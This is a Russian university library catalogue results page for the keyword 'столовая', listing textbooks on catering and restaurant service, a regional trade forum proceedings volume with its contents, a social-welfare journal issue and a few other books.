Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

215 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СТОЛОВАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 23
1. 
Пасько, Ольга Владимировна. Организация обслуживания на предприятиях общественного питания [Электронный ресурс] / О. В. Пасько, Н. В. Бураковская, Е. В. Кулагина, 2014. - 1 r=on-line. - 210 с.
Держатели документа (Информация об экземплярах) 

Целью написания данного труда является формирование у студентов знаний специфики, особенностей организации сервисного обслуживания на предприятиях общественного питания, функционирующих при гостиницах и иных средствах размещения.

В пособии дана характеристика типов предприятий общественного питания, изложен процесс информационного сопровождения предоставления услуг питания, показаны особенности разных форм и методов обслуживания клиентов, описаны перспективные направления развития сервиса и услуг общественного питания.

Пособие разработано в соответствии с рабочей программой подготовки студентов направления 100100.62 "Гостиничное дело", профиля подготовки "Ресторанная деятельность" и адресовано студентам дневной и заочной форм обучения.

Полный текст
2. 
Главчева С. И. Организация производства и обслуживание в ресторанах и барах [Текст] / С. И. Главчева, Л. Е. Чередниченко, 2012. - 205 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- БИЗНЕС РЕСТОРАННЫЙ -- РЕСТОРАЦИЯ РУССКАЯ -- РЕСТОРАЦИЯ ЗАРУБЕЖНАЯ -- РЕСТОРАН - ИСТОРИЯ -- РЕСТОРАН -- БАР -- ПОСУДА СТОЛОВАЯ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА ФАЯНСОВАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА МЕТАЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ДОГОТОВКИ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ОРГАНИЗАЦИЯ ТРУДА -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- ЗАМЕНА ПОСУДЫ -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- КАРТА СИГАРНАЯ -- КАРТА КАЛЬЯННАЯ -- КАЛЬЯН -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- КОФЕ - BREAK -- БАНКЕТ - ЧАЙ -- ФОНДЮ -- СТОЛ ШВЕДСКИЙ -- ОБСЛУЖИВАНИЕ ПРАЗДНИЧНЫХ ВЕЧЕРОВ -- КЕЙТЕРИНГ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- ПЕРСОНАЛ РЕСТОРАНА -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- БАРМЕН

В учебном пособии описана организация обслуживания потребителей в ресторанах и барах с учетом современных требований рынка, отечественного и зарубежного опыта, рассмотрены особенности проведения различных мероприятий и банкетов. Представлена организация проведения новых видов обслуживания по типу «сырной тележки», кейтеринга, предложены примеры написания винной, сигаретной, коньячной и кальянной карт. Приведены описания состава и организации работы производственных помещений и помещений для потребителей, их оснащения современным оборудованием, мебелью, а также характеристика различных видов ресторанной и барной посуды и белья.

Пособие предназначено для студентов вузов, а также работников предприятий общественного питания.

3. 
Бирюкова, Вера Васильевна. Технология обслуживания в общественном питании [Электронный ресурс] / В. В. Бирюкова, Н. В. Шевченко, 2013. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
Держатели документа (Информация об экземплярах) 

Учебное электронное издание представляет собой учебное пособие, в котором освещены вопросы совершенствования обслуживания на предприятиях общественного питания, информационное обеспечение процесса обслуживания, этапы его организации, услуги по организации обслуживания иностранных туристов и на социально ориентированных предприятиях питания. Особое внимание уделено особенностям торговых помещений ресторанов, их характеристике и оснащению, формам обслуживания; выбору столовой посуды, приборов, белья; обслуживанию приемов и банкетов.

Предназначено для студентов специальности 080502 "Экономика и управление на предприятии (торговля и общественное питание)" очной, очно-заочной и заочной форм обучения.

Полный текст
4. 
Сборник материалов II Торгового форума Сибири [Текст] / Правительство Ом. обл., Координац. совет по торговле и потребит. рынку межрегионал. ассоц. "Сибирское соглашение", Ом. гос. ин-т сервиса, Рос. экон. ун-т им. Г. В. Плеханова, Ом. ин-т (фил.), Торгово-пром. палата Ом. обл., 2013. - 417 с.
Ключевые слова 
КОРПОРАТИВНОЕ -- УПРАВЛЕНИЕ -- СОЦИАЛЬНЫЙ -- АУДИТ -- КООПЕРАЦИЯ -- КЛАСТЕР -- КОРПОРАЦИЯ -- ЧЕЛОВЕЧЕСКИЙ -- ПОТЕНЦИАЛ -- КОММУНИКАЦИЯ -- БАНКОВСКИЙ -- МАРКЕТИНГ -- ПРОДАЖА -- КОНСОЛИДИРОВАННЫЙ -- БЮДЖЕТ -- КОРПОРАТИВНАЯ -- КУЛЬТУРА -- БИЗНЕС -- УДАЛЕННАЯ -- РОССИЯ -- ФИНАНСИРОВАНИЕ -- ПУШНОЙ -- ЭКОНОМИЧЕСКИЙ -- КРИЗИС -- ИННОВАЦИОННАЯ -- ЭКОНОМИКА -- ВНЕШНЕЭКОНОМИЧЕСКАЯ -- ДЕЯТЕЛЬНОСТЬ -- ОМСКАЯ -- ОБЛАСТЬ -- ИНВЕСТИЦИЯ -- ЛИЗИНГ -- ОТЧЕТНОСТЬ -- ОРГАНИЗАЦИЯ -- ВТО -- СЕЛЬСКИЙ -- ТУРИЗМ -- ФАНДРАЙЗИНГ -- ПРОСЬЮМЕРСТВО -- КАЧЕСТВО -- ЭКСПЕРТИЗА -- ЗАЩИТА -- ПРАВО -- ПОТРЕБИТЕЛЬ -- ПОТРЕБИТЕЛЬСКАЯ -- КООПЕРАЦИЯ -- УЧЕТНАЯ -- ПОЛИТИКА -- СЕРТИФИКАЦИЯ -- КВАЛИФИКАЦИЯ -- ВЫПУСКНИК -- ЯЗЫКОВАЯ -- КОМПЕТЕНЦИЯ -- ИМИТАЦИОННОЕ -- МОДЕЛИРОВАНИЕ -- СТИМУЛИРОВАНИЕ -- ТРУД -- ПЕРСОНАЛ -- КАДРЫ -- ЛИДЕР -- ПРОДАКТ -- ПЛЕЙСМЕНТ -- КРЕАТИВНЫЙ -- ИННОВАЦИОННЫЙ -- ТОВАР -- ИТ -- АУТСОРСИНГ -- БРЕНД -- РОЗНИЧНАЯ -- ТУРИСТИЧЕСКАЯ -- МЕРЧЕНДАЙЗИНГ -- ПЕРСОНАЛЬНЫЕ -- ДАННЫЕ -- НЕЙРОМАРКЕТИНГ -- КОНКУРЕНТОСПОСОБНОСТЬ -- ТОВАРНЫЙ -- АССОРТИМЕНТ -- EVENT -- ОПТОВАЯ -- СПОРТИВНЫЙ -- КОНКУРЕНЦИЯ -- ПИТАНИЕ -- ШКОЛА -- БОЛЬНИЦА -- БИОПРОДУКТ -- ПОДСЛАСТИТЕЛЬ -- ЦЕНА
Оглавление 
  • Пономарева, Т. М. Правовые условия формирования корпоративной культуры в сфере торговли / Т. М. Пономарева. - с.35-37
    Кл. слова: КУЛЬТУРА КОРПОРАТИВНАЯ, КУЛЬТУРА ТОРГОВЛИ
  • Худякова, О. Д. Безопасность сырья как основа качества алкогольной продукции / О. Д. Худякова. - с.129-131
    Кл. слова: ПРОДУКЦИЯ АЛКОГОЛЬНАЯ, БЕЗОПАСНОСТЬ СЫРЬЯ
  • Бураковская, Н. В. Инновационное направление в организации обслуживания на предприятиях индустрии питания / Н. В. Бураковская. - с.293-294
    Кл. слова: ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ, ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ
  • Бураковская, Н. В. Современные концепции и совершенствование организации обслуживания в школьных столовых / Н. В. Бураковская. - с.305-306
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ, СТОЛОВАЯ ШКОЛЬНАЯ
  • Есипова, М. С. Проектирование рецептуры творожно-растительного пудинга для школьного питания / М. С. Есипова, О. В. Пасько. - с.322-324
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Макарова, О. В. Исследование технологии ферментированного молочно-солодового продукта для питания школьников / О. В. Макарова. - с.341-344
    Кл. слова: ПРОДУКТ МОЛОЧНО-СОЛОДОВЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Пасько, О. В. Целевые научно-практические исследования по оценке состояния и решению проблем школьного питания в г. Омске / О. В. Пасько. - с.346-348
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Шадрин, М. А. Мониторинг организации питания столовой СОШ №105 г. Омска / М. А. Шадрин, М. С. Бурикова. - с.377-379
    Кл. слова: СТОЛОВАЯ ШКОЛЬНАЯ
  • Шадрин, М. А. Питание школьников в Омском регионе: проблемы, перспективы развития / М. А. Шадрин, Л. Г. Германская. - с.380-381
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Волкова, И. А. Стратегические приоритеты технического развития сельского хозяйства региона / И. А. Волкова. - с.394-399
    Кл. слова: СЕЛЬСКОЕ ХОЗЯЙСТВО - РЕГИОН
  • Авдейчикова, Е. В. Проблемы развития удалённой торговли в России / Е. В. Авдейчикова. - с.38-42
  • Баетова, Д. Р. Преимущества торгового финансирования / Д. Р. Баетова, Е. А. Дмитренко. - с.43-45
  • Безбородова, Т. М. Социальная ответственность государства и торгового бизнеса при использовании труда иностранных работников / Т. М. Безбородова. - с.45-49
  • Гончарова, О. В. Международные аспекты пушного бизнеса в первом десятилетии XXI века / О. В. Гончарова. - с.49-54
    Кл. слова: XXI В.
  • Горбунов, П. И. Конкурентное развитие региона на основе стратегического евразийского проекта "Омский Локомотив - М" / П. И. Горбунов, В. В. Лизунов. - с.54-59
  • Елкина, В. Н. Становление территориального бизнес-сообщества как фактор развития малого и среднего бизнеса в условиях инновационной экономики / В. Н. Елкина. - с.59-64
  • Кириллов, Ю. Г. Современное состояние, динамика и перспективы развития внешнеэкономической деятельности Омской области в условиях экономического кризиса / Ю. Г. Кириллов. - с.64-67
  • Коновалов, К. Л. Тезаурус как системная информация для стратегического анализа и развития предпринимательства / К. Л. Коновалов. - с.67-70
  • Кривцов, А. И. Методика оценки эффективности инвестиций в лизинг на основе международной практики / А. И. Кривцов. - с.70-76
  • Лихтарова, О. В. Анализ международной практики правовых аспектов публикуемой отчетности организации / О. В. Лихтарова. - с.77-80
  • Метелев, К. А. Устойчивое развитие региона в условиях ВТО / К. А. Метелев. - с.81-85
  • Метелев, С. Е. Россия в ВТО: условия вступления и первые итоги / С. Е. Метелев, С. Н. Хоботова. - с.85-92
  • Свиридова, Е. А. Сельский туризм: европейский опыт и региональные перспективы / Е. А. Свиридова. - с.92-96
  • Скрипник, Т. В. Фандрайзинг - как это будет по-русски? / Т. В. Скрипник. - с.96-100
  • Шулбаева, М. Т. Просьюмерство как активный стиль жизни / М. Т. Шулбаева, П. Г. Боргояков, К. Л. Коновалов. - с.101-102
    Кл. слова: ПОКУПАТЕЛЬ
  • Болотова, С. С. Требования к качеству и безопасности средств по уходу за волосами / С. С. Болотова. - с.103-105
  • Данилова, Н. В. Качество куриных яиц на потребительском рынке г. Омска / Н. В. Данилова. - с.105-110
  • Королева, Ю. Е. Оценка качества шампуней, реализуемых на Омском потребительском рынке / Ю. Е. Королева. - с.110-113
    Кл. слова: РЫНОК
  • Королева, Ю. Е. Контрафактные и фальсифицированные товары как угроза безопасности на потребительском рынке / Ю. Е. Королева, Н. М. Катаева. - с.113-116
  • Королькова, Л. В. Качество товаров и потребительская экспертиза / Л. В. Королькова. - с.116-119
  • Плохотиков, С. И. К вопросу об экспертизе качества сложных электробытовых товаров / С. И. Плохотиков, А. А. Степанов, О. В. Рогова. - с.119-121
  • Семочкин, А. В. / А. В. Семочкин, Е. В. Корниенко. - с.122-124
  • Судакова, И. К. Исследование безопасности отделочных материалов на поливинилхлоридной основе / И. К. Судакова, Т. В. Котова. - с.124-126
  • Тимохина, Г. С. Соблюдение прав потребителей как основа формирования потребительской лояльности / Г. С. Тимохина. - с.126-129
  • Худякова, О. Д. Безопасность сырья как основа качества алкогольной продукции / О. Д. Худякова. - с.129-131
  • Исаев, А. В. Потребительская кооперация Омской области: в содружестве с властью - ради благополучия селян / А. В. Исаев. - с.132-134
  • Польский, В. С. Пути и направления инновационного развития потребительской кооперации на основе проблемно-задачного и системного подходов / В. С. Польский. - с.134-138
  • Иванов, К. К. Инвестиции как основной инструмент долгосрочного планирования / К. К. Иванов, С. С. Мельникова. - с.139-140
  • Миерманова, С. Т. Учетная политика организации в целях бухгалтерского управленческого учета / С. Т. Миерманова. - с.141-142
  • Романенко, Е. В. Особенности развития динамических способностей малого и среднего предпринимательства в сфере торговли Омского региона / Е. В. Романенко. - с.143-147
  • Федотенко, С. А. Особенности осуществления предпринимательской деятельности без образования юридического лица / С. А. Федотенко, Т. А. Чижикова. - с.147-149
  • Черепанова, И. В. Анализ и перспективы развития лицензионного законодательства Российской Федерации / И. В. Черепанова. - с.149-154
  • Бабурина, Т. Н. Гармония образовательных традиций европейских наций как принцип европейского пространства высшего образования / Т. Н. Бабурина. - с.155-157
  • Богданов, А. Н. Формирование фондов оценочных средств как условие реализации ФГОС при профессиональном обучении поваров / А. Н. Богданов, Г. Ф. Авдеева. - с.157-159
  • Власенко, О. В. Реализация принципов в социальной ответственности ВУЗа как условие интеграции в международное образовательное пространство (на примере Омского института (филиала) РГТЭУ) / О. В. Власенко. - с.159-164
  • Гурбо, Н. М. Сертификация профессиональных квалификаций выпускников в региональной системе профессионального образования / Н. М. Гурбо, М. М. Амренова. - с.164-166
  • Забудский, Г. Г. О подготовке специалистов торгово-экономической сферы по методам оптимизации / Г. Г. Забудский. - с.166-168
  • Климова, Э. Н. Коммуникативно-гуманистическая парадигма как основа подготовки специалистов сферы услуг / Э. Н. Климова, А. Н. Аршинова. - с.169-171
  • Кораблева, А. А. Отраслевой и человеческий потенциал в основе экономической безопасности региона / А. А. Кораблева. - с.171-175
  • Куламихина, И. В. Языковая компетенция, как фактор востребованности выпускника / И. В. Куламихина. - с.175-178
  • Мещеряков, В. А. Обучение студентов имитационному моделированию систем массового обслуживания в MATLAB / В. А. Мещеряков, В. П. Денисов, Л. А. Денисова. - с.179-181
  • Сватков, Б. С. Роль профориентации учащихся общеобразовательных школ в подготовке кадров для торговой отрасли Омской области / Б. С. Сватков. - с.181-184
  • Тарасова, Т. Н. Мотивация трудовой деятельности персонала микропредприятий индустрии туризма / Т. Н. Тарасова. - с.184-186
  • Хайрулина, Л. Р. Проблемы стимулирования труда персонала магазинов ООО "Компания Холидей" Омский филиал / Л. Р. Хайрулина. - с.186-189
  • Цыганова, О. А. Взаимодействие вузов и работодателей как механизм повышения качества подготовки молодых специалистов / О. А. Цыганова. - с.189-191
  • Шиповалов, А. Г. Качественные параметры кадрового обеспечения деятельности предприятий потребительского рынка / А. Г. Шиповалов. - с.191-194
  • Шкурко, О. В. Вузовская подготовка лидеров торговых предприятий: проблемы и перспективы / О. В. Шкурко. - с.194-196
  • Архипов, А. Е. Специфика маркетинга услуг: теоретический аспект / А. Е. Архипов, К. А. Лиханов. - с.197-199
  • Архипов, А. Е. Маркетинговые аспекты обеспечения инвестиционной привлекательности регионального туризма / А. Е. Архипов, И. Ю. Севрюков. - с.199-202
  • Бургат, В. В. Продакт плейсмент - современная технология маркетинговых коммуникаций / В. В. Бургат. - с.202-205
  • Вайнер, А. С. Особенности развития малого предпринимательства в сфере потребительских услуг / А. С. Вайнер. - с.206-209
  • Горшков, М. В. Средства электронной коммуникации в прямом маркетинге / М. В. Горшков. - с.209-213
  • Зеркалий, Н. Г. Креативный маркетинг как новая технология для потребительского рынка / Н. Г. Зеркалий. - с.217-221
  • Коваленко, Е. В. Маркетинговые стратегии на этапах жизненного цикла предприятия / Е. В. Коваленко, А. А. Рыбак. - с.224-228
  • Козлова, О. А. Возможности обучения потребителей на рынке инновационных товаров / О. А. Козлова, О. С. Иванова. - с.228-232
  • Медведева, Н. В. ИТ - аутсорсинг для торговых предприятий: теория и практика / Н. В. Медведева. - с.232-233
  • Нижальская, Н. И. Маркетинговый подход к управлению деятельностью предприятий торговли / Н. И. Нижальская, В. Д. Нижальская. - с.234-236
  • Нюренбергер, Л. Б. Современные подходы к реализации маркетинговых коммуникаций коммерческой организации / Л. Б. Нюренбергер, А. В. Курнявкин. - с.236-238
  • Нюренбергер, Л. Б. Корпоративная культура компании как внутренний компонент коммуникаций / Л. Б. Нюренбергер, А. А. Лаптев. - с.238-240
  • Нюренбергер, Л. Б. Управление брендом торгово-развлекательного комплекса / Л. Б. Нюренбергер, Е. Ю. Пятова. - с.241-243
  • Орехов, И. В. Интернет-магазин услуг по аутсорингу ITRUST. Оптимизация бизнес-процессов с целью повышения эффективности и прозрачности взаимоотношений между заказчиками и подрядчиками / И. В. Орехов. - с.243-244
  • Пятова, Е. Ю. Новая парадигма разработки комплекса маркетинговых коммуникаций / Е. Ю. Пятова. - с.249-250
  • Реброва, Н. П. Анализ оборота розничной торговли Омской области за январь - сентябрь 2010 - 2012 годов / Н. П. Реброва, В. М. Седельников. - с.251-254
  • Седова, В. М. Современные тенденции развития рынка туристских услуг / В. М. Седова, А. А. Кучковский. - с.254-258
  • Сухостав, Е. В. Разработка планограммы как ключевого инструмента мерчендайзинга / Е. В. Сухостав. - с.258-260
  • Таминдаров, Р. Т. Защита персональных данных / Р. Т. Таминдаров. - с.260-262
  • Таскаев, Е. Н. Методические основы оценки маркетинговой среды рынка услуг / Е. Н. Таскаев, М. С. Чернова. - с.262-266
  • Хайрулина, Л. Р. Нейромаркетинг как инструмент изучения поведения потребителей / Л. Р. Хайрулина. - с.266-268
  • Хайруллина, М. В. Факторы конкурентоспособности торговых организаций / М. В. Хайруллина, М. А. Нюренбергер. - с.269-272
  • Шарипова, Н. А. Использование event-маркетинга для привлечения клиентов / Н. А. Шарипова. - с.272-274
  • Швец, В. В. Особенности формирования товарного ассортимента в оптовой торговле / В. В. Швец, Н. В. Козырев. - с.274-275
  • Шереметьев, Н. К. Аспекты коммуникационной политики спортивного маркетинга / Н. К. Шереметьев. - с.276-281
  • Али-Аскяри, С. А. Современное состояние и перспективы интеграции форм хозяйствования на региональном рынке потребительских товаров / С. А. Али-Аскяри, В. М. Шкиренко. - с.282-287
  • Али-Аскяри, С. А. Особенности управления ресурсным потенциалом торговых организаций в условиях интеграции / С. А. Али-Аскяри, Х. З. Максудов. - с.287-289
  • Сватков, Б. С. Актуальность информационных технологий, для развития торговли на примере базы "Торговый Лоцман" / Б. С. Сватков. - с.289-291
  • Шкуренко, В. В. Стратегия взаимодействия местных сетей с локальными производителями. Проблемы и перспективы / В. В. Шкуренко. - с.291-292
  • Гурман, В. И. Подходы к оценке инвестиционных проектов для байкальского региона / В. И. Гурман, И. Р. Либенсон, Д. М. Скитневский. - с.297-301
  • Бакаева, В. В. Методический подход к оценке уровня развития торговли региона (города) / В. В. Бакаева, Н. В. Курушина. - с.389-393
  • Волкова, И. А. Стратегические приоритеты технологического развития сельского хозяйства региона / И. А. Волкова. - с.394-399
  • Кычанов, Б. И. Анализ динамики развития розничной торговли в омском регионе / Б. И. Кычанов. - с.399-401
  • Шайтанова, Л. М. Исследование динамики покупной цены товара как одного из параметров развития потребительского рынка / Л. М. Шайтанова, Л. Н. Гончаренко. - с.408-411
5. 
Субеева, Нэля Александровна. Организация питания в курортных и гостиничных комплексах [Текст] : учеб. пособие: в 2 ч. Ч. 1 : Организация обслуживания на предприятиях общественного питания, 2010. - 84 с.
Держатели документа (Информация об экземплярах) 

Учебное пособие состоит из 2 частей. В 1 части пособия рассматриваются порядок обслуживания посетителей на предприятиях общественного питания, особенности организации обслуживания и предоставления услуг на предприятиях различных типов и классов, современные методы и формы обслуживания. БОльшое внимание уделяется подготовке ресторанов, баров к обслуживанию потребителей. Дана характеристика всех видов столовой посуды и приборов, сервировки столов; уделено большое внимание правилам подачи блюд. Во 2 части пособия будут рассмотрены вопросы организации питания иностранных туристов, а также организация диетического питания в курортных комплексах.

Цель учебного пособия - помочь студентам в изучении таких теоретических вопросов, как организация обслуживания на предприятиях общественного питания, основные правила обслуживания потребителей, а в дальнейшем применять полученные знания на практике. Составлено в соответствии с рабочей программой по данной дисциплине для студентов дневного отделения. Пособие предназначено для студентов, обучающихся по специальности 230500 Социально-культурный сервис и туризм, специализация "Гостиничный сервис".

Полный текст
6. 
Эргономика квартиры [Текст]. Ч. 1 : Прихожая, гостиная, столовая, 2004. - 222, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
7. 
Вопросы социального обеспечения. - Журнал, 2011г. № 17
Оглавление 
  • Общественное обсуждение законопроекта. - с.2
  • Бороться с наркоугрозой жесткими и последовательными методами. - с.3-4
  • Прописывать в брачном контракте судьбу детей в случае развода. - с.4-5
  • Социальное партнерство в народных традициях. - с.5-6
  • О проблемах соблюдения прав пациентов. - с.6
  • Матери детей инвалидов нуждаются в признании статуса "матери-сиделки". - с.7
  • Молодая мама отсудила у соцстраха. - с.8-9
  • Калинская, Е. Мультики в больницах / Е. Калинская. - с.9
  • Благотворительная столовая. - с.9
  • Пермякова, П. "Забили" на жизненные сложности / П. Пермякова. - с.10
  • Макарова, В. Завершилась лагерная смена / В. Макарова. - с.10
  • Круглые столы в рамках программы "Компас для детства". - с.7-8
  • Трудовой кодекс: время перемен?. - с.11-12
  • Безвозвратный капитал по программе самозанятости. - с.13
  • Гончарова, О. Характер и зарплата / О. Гончарова, М. Подцеро. - с.13
  • Беляев, Ю. Трудовая деятельность за пенсионным порогом: время принятия решений / Ю. Беляев. - с.14-18
  • Кулябин, Б. Управление коллективом: секрет успеха / Б. Кулябин. - с.19-20
  • Столяренко, Л. Д. Читаем книги: стратегии, тактики, виды общения / Л. Д. Столяренко, С. И. Самыгин. - с.20-21
  • Просмотр телевизора сокращает жизнь. - с.22
  • Минералка в жару. - с.22-23
  • Новые методы борьбы с лишним весом. - с.23
  • Орешкин, В. Гражданская инициатива / В. Орешкин. - с.24
  • Отходы - в пюре. - с.24-25
  • Система "все включено" не должна включать мордобой, отравления и ДТП. - с.25
  • Жилье для молодых семей. - с.26
  • Распродажа страны. - с.26-27
  • "Неблагополучный" город. - с.27
  • Президенту пишут в блогах. - с.28-30
  • Волонтеры в разных городах и областях объединяются. - с.31
  • Приехал театр дружбы и добра. - с.31
  • От детей отказываются не только наркоманки. - с.31
  • Кустарев, А. Старение населения и бездетность: главные вызовы нового времени / А. Кустарев. - с.32
  • Ахметжанова, Б. Непреодолимых барьеров нет / Б. Ахметжанова. - с.33
  • Социальное обеспечение и социальное страхование. - с.34
  • Ананьева, Л. Консультации / Л. Ананьева, Е. Мельникова. - с.34-35
  • Пенсионный самоучитель. - с.35-36
  • Баркова, Л. Вопрос-ответ / Л. Баркова, М. Золотых. - с.38
  • Карасевич, Л. Вопрос-ответ / Л. Карасевич, В. Комарова. - с.38-39
  • Квартиры одиноких пенсионеров. - с.40
  • Стартовал проект "К активному обществу в любом возрасте". - с.40-41
  • Новая программа для инвалидов. - с.41
  • "Третий возраст - шансы для социального включения". - с.42
  • Многодетных отцов могут освободить от службы в армии. - с.42
  • Праздники 15 сентября. - с.43
  • Как человек покидает тело. - с.43-44
  • "Супергерой" советского кино. - с.44
  • "Другой" ребенок. - с.44-45
  • Вирус победил рак. - с.45
  • Хулиганы и двоечники. - с.45-46
  • Зиндер, Н. Факты истории... / Н. Зиндер. - с.46
  • Рецепт мадам Буланже: творожная шарлотка. - с.46
Держатели документа (Информация об экземплярах) 
8. 
Быстров, Сергей Александрович. Технология и организация ресторанного бизнеса и питания туристов [Текст] / С. А. Быстров, 2019. - 535 с.
Держатели документа (Информация об экземплярах) 

Учебник нацелен на формирование у читателей знаний о специфике ресторанного бизнеса, раскрывает основные организационно-юридические аспекты, связанные с открытием и дальнейшим функционированием предприятий индустрии питания. Отдельное внимание уделено анализу современных мировых тенденций в организации услуг общественного питания и перспектив их внедрения и развития в российском ресторанном бизнесе. Теоретический материал учебника для эффективности усвоения и применения в российских бизнес-реалиях подкреплен практическими примерами, статистическими выкладками, ссылками на законодательные документы, а для наглядности часть материала представлена в графическом виде.

Структура содержания учебника выстроена в соответствии с требованиями Федерального государственного образовательного стандарта высшего образования последнего поколения по направлению подготовки 19.03.04 "Технология продукции и организация общественного питания" и предназначена для бакалавров, обучающихся по данному и сходным направлениям подготовки (43.03.02 "Туризм", 43.03.03 "Гостиничное дело", 43.03.01 "Сервис").

Учебник рекомендуется также магистрам, аспирантам, преподавателям российских вузов, начинающим рестораторам и специалистам рынка услуг общественного питания.

9. 
Лондон, Джулия. Столовые [Текст] / Д. Лондон ; пер. С. Кормашова, 1997. - 64 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
10. 
Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для колледжей и проф.-техн. лицеев, уч-щ / сост. Л. А. Радченко, 2001. - 372 с.
11. 
Лоусан Ф. Рестораны. Клубы. Бары [Текст] : планирование, дизайн, управление / Ф. Лоусан, 2004. - 385 с.
12. 
Технология обслуживания в общественном питании [Текст] : метод. указания для выполнения курсовой работы / сост. : В. В. Бирюкова, Н. В. Шевченко, 2006. - 36 с.
Держатели документа (Информация об экземплярах) 
Полный текст
13. 
Панова, Лидия Александровна. Организация производства на предприятиях общественного питания (в экзаменационных вопросах и ответах) [Текст] : учеб. пособие / Л. А. Панова, 2005. - 318, [1] с.
Держатели документа (Информация об экземплярах) 

Учебное питание охватывает широкий круг вопросов, связанных с основными направлениями развития общественного питания. Здесь изложены основные вопросы по организации производства в соответствии с государственными требованиями к уровню подготовки выпускников колледжей, училищ, готовящих специалистов для общественого питания. Специальные разделы посвящены практическим вопросам по организации снабжения, складского хозяйства; Подробно описывается организация работы цехов, раздаточных; даны основы рациональной организации труда.

Подача материала в форме экзаменационных вопросов и ответов и текстовый материал позволяют успешно усвоить курс по организации производства на предприятиях общественного питания.

14. 
Панова, Лидия Александровна. Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие в экзаменац. вопр. и ответах / Л. А. Панова, 2003. - 301, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основные вопросы по организации обслуживания в соответствии с государственными требованиями к уровню подготовки выпускников колледжей, готовящих специалистов для предприятий общественного питания.

Подача материала в форме экзаменационных вопросов и ответов и тестовый материал, закрепляющий знания, позволят успешно усвоить курс по обслуживанию на предприятиях общественного питания.

Учебное пособие может быть использовано как во время аудиторной подготовки, так и и самостоятельного изучения материала.

15. 
Пчелинцева, Юлия Александровна. Маркетинговое обеспечение деятельности предприятий общественного питания [Текст] : Автореф. дис.. канд. экон. наук: 08.00.05 - Экономика и управление народным хозяйством (3. Маркетинг) / Ю. А. Пчелинцева, 2005. - 18 с.
Держатели документа (Информация об экземплярах) 
16. 
Слезкин, Юрий Львович. Шахматный ход [Текст] : роман, повести / Юрий Слезкин ; сост. С. С. Никоненко ; предисл. И. Ковалевой, 1981. - 573, [2] с.
Оглавление 
  • Столовая гора
  • Разными глазами
  • Козел в огороде
  • Огневая точка
Держатели документа (Информация об экземплярах) 
17. 
Столовая и кухня [Текст] : пер. с исп. / пер. Е. А. Кантова, 2004. - 128 с.

Подробные инструкции по отделке стен и пола, выбору светильников, реставрации мебели и др.

18. 
Ресторанный сервис. Основы международной практики обслуживания для профессионалов и начинающих [Текст] : справочное издание / С. Зигель и др., 2003. - 287 с.
Ключевые слова 
ОФИЦИАНТ -- ПРИЕМ ГОСТЕЙ -- РЕСТОРАН - ПЕРСОНАЛ -- СОМЕЛЬЕ -- ПОСУДА СТОЛОВАЯ -- ДИЗАЙН ресторана -- СЕРВИРОВКА СТОЛА -- Завтрак - ресторан -- Ленч - ресторан -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- БАР -- БУФЕТ -- БАНКЕТ -- КОКТЕЙЛЬ - парти -- Кухня датская -- КУХНЯ австрийская -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ИСПАНСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- Кухня швейцарская -- Кухня шведская
19. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
